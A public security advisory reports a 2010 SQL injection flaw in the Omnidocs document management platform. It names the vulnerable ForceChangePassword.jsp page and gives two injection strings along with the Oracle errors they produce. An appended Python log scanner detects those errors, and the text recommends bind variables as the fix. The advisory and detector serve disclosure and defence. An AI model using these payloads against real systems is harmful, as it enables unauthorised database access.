Omnidocs SQL injection Vulnerability

2010.02.28
Credit: thebluegenius
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA
---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By    : Thebluegenius.
Email : rajsm@isac.org.in
Blog  : thebluegenius.com.
---------------------------------------------------
Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.
------------------
Vulnerability
------------------
Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error : ORA-00907: missing right parenthesis

Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated
-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in

References:

http://xforce.iss.net/xforce/xfdb/56237
http://www.securityfocus.com/bid/38304
http://www.exploit-db.com/exploits/11393
http://secunia.com/advisories/38527
http://packetstormsecurity.org/1002-exploits/omnidocs-sql.txt
http://osvdb.org/62403
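
Detection sketch, added here as an example and not part of the original advisory or of the vendor's code: it scans application-server log lines for the two Oracle parser errors quoted above when they are raised by ForceChangePassword.jsp, and generalizes to two related Oracle syntax errors. The log line format, the sample entries and the function names are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Oracle parser errors showing that request input changed the SQL text.
# The first two are quoted in the advisory; the last two are related
# syntax errors added here (assumption: same root cause).
SYNTAX_ERRORS = {
    "ORA-00907": "missing right parenthesis",
    "ORA-01756": "quoted string not properly terminated",
    "ORA-00933": "SQL command not properly ended",
    "ORA-00936": "missing expression",
}

# Constructed log format (assumption): "<timestamp> <client> <path> <message>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")
ORA_RE = re.compile(r"\bORA-\d{5}\b")

def find_parser_errors(lines, page="/ForceChangePassword.jsp"):
    """Return (line_no, client, path, code) per Oracle syntax error on the watched page."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the expected format
        _, client, path, msg = m.groups()
        path = path.split("?", 1)[0]  # ignore the query string
        if not path.endswith(page):
            continue
        for code in ORA_RE.findall(msg):
            if code in SYNTAX_ERRORS:  # skip non-syntax errors such as ORA-00001
                findings.append((n, client, path, code))
    return findings

def clients_over_threshold(findings, threshold=2):
    """Clients that triggered at least `threshold` parser errors."""
    counts = Counter(client for _, client, _, _ in findings)
    return sorted(c for c, k in counts.items() if k >= threshold)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    "2010-02-10T09:14:02 192.0.2.10 /omnidocs/ForceChangePassword.jsp password change ok",
    "2010-02-10T09:15:40 198.51.100.7 /omnidocs/ForceChangePassword.jsp java.sql.SQLException: ORA-00907: missing right parenthesis",
    "2010-02-10T09:15:52 198.51.100.7 /omnidocs/ForceChangePassword.jsp java.sql.SQLException: ORA-01756: quoted string not properly terminated",
    "2010-02-10T09:16:11 192.0.2.33 /omnidocs/login.jsp java.sql.SQLException: ORA-01017: invalid username/password; logon denied",
    "2010-02-10T09:17:05 203.0.113.5 /omnidocs/ForceChangePassword.jsp java.sql.SQLException: ORA-00001: unique constraint violated",
]
```

A hit on these codes means user input reached the SQL parser unescaped; the durable fix is bind variables in the page's queries and generic error pages that do not return ORA- messages to the client.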


Copyright 2024, cxsecurity.com